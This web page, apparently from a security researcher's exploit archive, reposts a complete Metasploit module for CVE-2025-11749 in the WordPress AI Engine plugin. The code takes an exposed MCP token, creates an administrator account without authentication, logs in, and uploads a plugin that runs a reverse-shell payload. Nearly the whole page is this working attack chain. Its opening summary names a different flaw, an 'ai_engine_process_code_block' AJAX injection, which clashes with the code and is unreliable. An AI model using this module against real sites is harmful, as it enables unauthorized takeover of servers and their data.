WordPress AI Engine 3.1.3 Remote Code Execution
WordPress AI Engine 3.1.3 Remote Code Execution
WordPress AI Engine plugin versions up to 3.1.3 contained a critical Remote Code Execution (RCE) vulnerability. This flaw allowed **unauthenticated attackers** to execute arbitrary PHP code on the affected server.

The vulnerability stemmed from insufficient validation and sanitization of user-supplied input, specifically within the `ai_engine_process_code_block` AJAX action. By crafting a malicious request, attackers could bypass security checks and inject their own code.

Successful exploitation granted full control over the compromised WordPress site and potentially the underlying server. Users are urged to immediately update to version 3.1.4 or higher to patch this critical security hole.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
# Ranking constant declared for this module.
Rank = ExcellentRanking

# Framework mixins. Helpers called in this class but not defined in this file
# (e.g. send_request_cgi, wordpress_login, register_files_for_cleanup) are
# presumably provided by these -- confirm against the framework sources.
include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress

# NOTE(review): presumably makes the framework run `check` before `exploit` -- confirm.
prepend Msf::Exploit::Remote::AutoCheck

# Matched against MCP error messages and raw response bodies in
# send_mcp_tool_call to recognise a "user already exists" reply.
ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
# Matched against MCP result text and raw response bodies in
# send_mcp_tool_call to recognise a successful create/update reply.
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i

# Declares the module metadata (name, description, authors, references,
# targets, notes) and registers the USERNAME, PASSWORD and EMAIL options.
#
# @param info [Hash] metadata supplied by the caller; it is passed to
#   update_info together with this module's own values, and the result is
#   handed to super.
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
'Description' => %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
},
'Author' => [
'Emiliano Versini', # Vulnerability discovery
'Khaled Alenazi (Nxploited)', # PoC
'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
'dledda-r7' # Reviewer
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-11749'],
['URL', 'https://github.com/Nxploited/CVE-2025-11749']
],
# Union of the platforms and architectures used by the targets listed below.
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-11-04',
# Index into 'Targets': 0 is the 'PHP In-Memory' entry.
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

# Credentials of the administrator account that `exploit` creates. All three
# options are required; each default value is produced by Faker when this
# method runs.
register_options(
[
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
]
)
end

# Decides whether the target looks exploitable.
#
# Order of checks: WordPress reachable, then the plugin version reported by
# check_plugin_version_from_readme for 'ai-engine' against '3.1.4', then
# whether an MCP token can be found. A discovered token is cached in @token
# so that `exploit` can reuse it.
#
# @return [Object] CheckCode::Unknown, CheckCode::Safe (plain or with a
#   message) or CheckCode::Appears
def check
  return CheckCode::Unknown unless wordpress_and_online?

  readme_verdict = check_plugin_version_from_readme('ai-engine', '3.1.4')
  patched = readme_verdict == CheckCode::Safe
  return readme_verdict if patched

  @token = find_token
  @token ? CheckCode::Appears : CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.')
end

# Runs the full chain: locate the MCP token, create (or take over) an
# administrator account with the USERNAME/PASSWORD/EMAIL options, log in with
# it, then upload and trigger the payload plugin.
#
# Aborts through fail_with when the target is not WordPress, no token is
# found, the account cannot be created, or the login fails.
#
# @return [Object] whatever upload_and_execute_payload returns
def exploit
  unless wordpress_and_online?
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
  end

  # Reuse the token cached by `check` when there is one.
  @token ||= find_token
  unless @token
    fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.')
  end

  login = datastore['USERNAME']
  secret = datastore['PASSWORD']
  mail = datastore['EMAIL']

  creation = create_admin_user(@token, login, secret, mail)
  fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if creation == false

  already_present = creation == :user_exists
  if already_present
    print_warning('User already exists, updating password and continuing exploitation...')
    update_user_password(@token, login, secret)
  end

  session_cookie = wordpress_login(login, secret)
  unless session_cookie
    hint = already_present ? ' User may exist with a different password.' : ''
    fail_with(Failure::UnexpectedReply, "Failed to log in to WordPress admin.#{hint}")
  end

  upload_and_execute_payload(session_cookie)
end

# REST API helpers
# Sends a request to a WordPress REST route, trying the `/wp-json/<route>`
# form first and falling back to the `?rest_route=<route>` query form.
#
# The fallback is used only when the first attempt got no response or a
# non-2xx status. Any 2xx reply (not just 200) is returned as-is: callers
# treat 204 as success, and replaying a POST that the server already accepted
# would execute the same MCP tool call twice.
#
# @param rest_path [String] REST route, e.g. '/' or '/mcp/v1/<token>/sse'
# @param method [String] HTTP verb; 'POST' adds a JSON content type
# @param data [String, nil] request body
# @return [Object, nil] the response from the attempt that was used, or nil
#   when the last attempt returned nothing
def send_rest_request(rest_path, method: 'GET', data: nil)
  opts = {
    'method' => method,
    'ctype' => method == 'POST' ? 'application/json' : nil,
    'data' => data
  }

  pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
  res = send_request_cgi(opts.merge('uri' => pretty_uri))
  return res if res && (200..299).cover?(res.code)

  vars_get = { 'rest_route' => rest_path }
  send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
end

# Fetches the REST route index ('/') and pulls the MCP token out of it.
#
# @return [String, nil] the token, or nil when none is found
def find_token
  index_response = send_rest_request('/')
  extract_token_from_routes(index_response)
end

# Scans the 'routes' map of a REST index response for a route of the form
# `/mcp/v1/<token>/sse` and returns the first <token> that is not the literal
# 'sse'.
#
# @param res [Object, nil] response exposing `code` and `get_json_document`
# @return [String, nil] the token, or nil when the response is missing, not a
#   200, has no 'routes' Hash, or contains no matching route
def extract_token_from_routes(res)
  return nil if res.nil? || res.code != 200

  route_index = res.get_json_document&.dig('routes')
  return nil unless route_index.is_a?(Hash)

  route_index
    .keys
    .grep(String)
    .filter_map { |path| path[%r{^/mcp/v1/([^/]+)/sse$}, 1] }
    .find { |candidate| candidate != 'sse' }
end

# MCP API helpers
# Sends a request to `/mcp/v1/<token>/<segments joined by '/'>` through
# send_rest_request.
#
# @param token [String] MCP token placed in the route
# @param segments [Array<String>] trailing path segments
# @param method [String] HTTP verb, forwarded unchanged
# @param data [String, nil] request body, forwarded unchanged
# @return [Object, nil] whatever send_rest_request returns
def send_mcp_request(token, segments, method: 'GET', data: nil)
  route = format('/mcp/v1/%<token>s/%<tail>s', token: token, tail: segments.join('/'))
  send_rest_request(route, method: method, data: data)
end

# Builds the JSON-RPC 2.0 `tools/call` request body for an MCP tool.
#
# @param tool_name [String] value of params.name
# @param arguments [Object] value of params.arguments
# @return [String] JSON text with keys jsonrpc, id (random integer in
#   1..999_999), method and params
def build_mcp_payload(tool_name, arguments)
  request_id = rand(1..999_999)
  call_params = { 'name' => tool_name, 'arguments' => arguments }
  envelope = {
    'jsonrpc' => '2.0',
    'id' => request_id,
    'method' => 'tools/call',
    'params' => call_params
  }
  envelope.to_json
end

# Calls an MCP tool over the `sse` route and returns the raw `result.content`
# value of the JSON reply, without interpreting it.
#
# @param token [String] MCP token
# @param tool_name [String] tool to invoke
# @param arguments [Object] tool arguments
# @return [Object, nil] the `result.content` value; nil when there is no
#   response, the status is not 200, or the body is not a JSON object
def send_mcp_tool_call_raw(token, tool_name, arguments)
  request_body = build_mcp_payload(tool_name, arguments)
  reply = send_mcp_request(token, ['sse'], method: 'POST', data: request_body)
  return nil unless reply && reply.code == 200

  document = reply.get_json_document
  document.is_a?(Hash) ? document.dig('result', 'content') : nil
end

# Calls an MCP tool over the `sse` route and classifies the outcome.
#
# Classification rules, in order:
# * no response or a status other than 200/204 -> false; 204 -> true
# * body is not a JSON object -> false
# * JSON-RPC `error` with code 'existing_user_login', or whose message matches
#   ERROR_PATTERN -> :user_exists
# * a `result.content` text item matching SUCCESS_PATTERN -> true
# * raw body matching ERROR_PATTERN -> :user_exists
# * raw body matching SUCCESS_PATTERN -> true
#
# A reply that carries a JSON-RPC `error`, or a result flagged `isError: true`,
# is never reported as success: SUCCESS_PATTERN is loose enough ("created",
# "success") to match failure texts such as "User could not be created".
# Such replies can still yield :user_exists through ERROR_PATTERN.
#
# Unexpected shapes (non-Hash result, non-Array content, non-Hash items,
# non-String text or message) are ignored rather than raising.
#
# @param token [String] MCP token
# @param tool_name [String] tool to invoke
# @param arguments [Object] tool arguments
# @return [true, false, Symbol] true, false or :user_exists
def send_mcp_tool_call(token, tool_name, arguments)
  payload = build_mcp_payload(tool_name, arguments)
  res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
  return false unless res
  return true if res.code == 204
  return false unless res.code == 200

  json_response = res.get_json_document
  return false unless json_response.is_a?(Hash)

  error = json_response['error']
  if error.is_a?(Hash)
    return :user_exists if error['code'] == 'existing_user_login'
    return :user_exists if error['message'].to_s.match?(ERROR_PATTERN)
  end

  result = json_response['result']
  failed = !error.nil? || (result.is_a?(Hash) && result['isError'] == true)

  unless failed
    content = result.is_a?(Hash) ? result['content'] : nil
    texts = Array(content).grep(Hash).map { |item| item['text'] }.grep(String)
    return true if texts.any? { |text| text.match?(SUCCESS_PATTERN) }
  end

  # Last resort: look at the raw body, which also covers tool errors that are
  # reported inside result.content instead of a JSON-RPC error object.
  body = res.body.to_s
  return :user_exists if body.match?(ERROR_PATTERN)
  return true if !failed && body.match?(SUCCESS_PATTERN)

  false
end

# User management
# Looks up the numeric ID of a user through the `wp_get_users` MCP tool.
#
# Each content item's 'text' is parsed as JSON (a single object or an array
# of objects). The first object whose 'user_login' equals `username` and that
# has an 'ID' supplies the result. Items whose text is not JSON are skipped,
# and so are parsed entries that are not JSON objects (null, numbers,
# strings), so a malformed reply yields nil instead of raising.
#
# @param token [String] MCP token
# @param username [String] exact login to look for
# @return [Integer, nil] the user ID, or nil when it cannot be determined
def get_user_id(token, username)
  arguments = {
    'search' => username,
    'search_columns' => ['user_login']
  }

  result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
  return nil unless result_content.is_a?(Array)

  result_content.each do |item|
    next unless item.is_a?(Hash) && item['text']

    begin
      parsed = JSON.parse(item['text'].to_s)
    rescue JSON::ParserError
      next
    end

    # A single user may come back as a bare object rather than a list.
    candidates = parsed.is_a?(Array) ? parsed : [parsed]
    user = candidates.grep(Hash).find { |entry| entry['user_login'] == username }
    return user['ID'].to_i if user && user['ID']
  end

  nil
end

# Asks the `wp_create_user` MCP tool to create an account with the
# 'administrator' role.
#
# @param token [String] MCP token
# @param username [String] sent as user_login
# @param password [String] sent as user_pass
# @param email [String] sent as user_email
# @return [true, false, Symbol] whatever send_mcp_tool_call returns
def create_admin_user(token, username, password, email)
  account = %w[user_login user_email user_pass].zip([username, email, password]).to_h
  send_mcp_tool_call(token, 'wp_create_user', account.merge('role' => 'administrator'))
end

# Resets the password of an existing user through the `wp_update_user` MCP
# tool.
#
# A warning is printed whenever the update cannot be confirmed: when the
# user's ID cannot be resolved, and when the tool call returns anything other
# than true. send_mcp_tool_call can return the truthy :user_exists, which
# does not mean the password was changed.
#
# @param token [String] MCP token
# @param username [String] login of the account to update
# @param password [String] new password
# @return [true, false, Symbol] false when the user ID is unknown, otherwise
#   the value returned by send_mcp_tool_call
def update_user_password(token, username, password)
  user_id = get_user_id(token, username)
  unless user_id
    print_warning("Could not resolve the ID of existing user '#{username}'; password was not updated.")
    return false
  end

  arguments = {
    'ID' => user_id,
    'fields' => {
      'user_pass' => password
    }
  }
  result = send_mcp_tool_call(token, 'wp_update_user', arguments)
  print_warning('Password update may have failed, attempting login anyway...') unless result == true
  result
end

# Payload execution
# Builds a plugin archive with random names, uploads it with the given admin
# cookie, registers the dropped files and directory for cleanup, and finally
# requests the payload script under the plugins URL.
#
# Aborts through fail_with when the upload is rejected.
#
# @param admin_cookie [Object] session cookie passed to wordpress_upload_plugin
# @return [Object, nil] the response to the GET request for the payload script
def upload_and_execute_payload(admin_cookie)
  random_tag = -> { Rex::Text.rand_text_alphanumeric(5).downcase }
  plugin_slug = "wp_#{random_tag.call}"
  payload_slug = "ajax_#{random_tag.call}"
  plugin_entry = "#{plugin_slug}.php"
  payload_script = "#{payload_slug}.php"

  archive = generate_plugin(plugin_slug, payload_slug)
  uploaded = wordpress_upload_plugin(plugin_slug, archive.pack, admin_cookie)
  fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

  register_files_for_cleanup(payload_script, plugin_entry)
  register_dir_for_cleanup("../#{plugin_slug}")

  trigger_uri = normalize_uri(wordpress_url_plugins, plugin_slug, payload_script)
  send_request_cgi('uri' => trigger_uri, 'method' => 'GET')
end
end
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.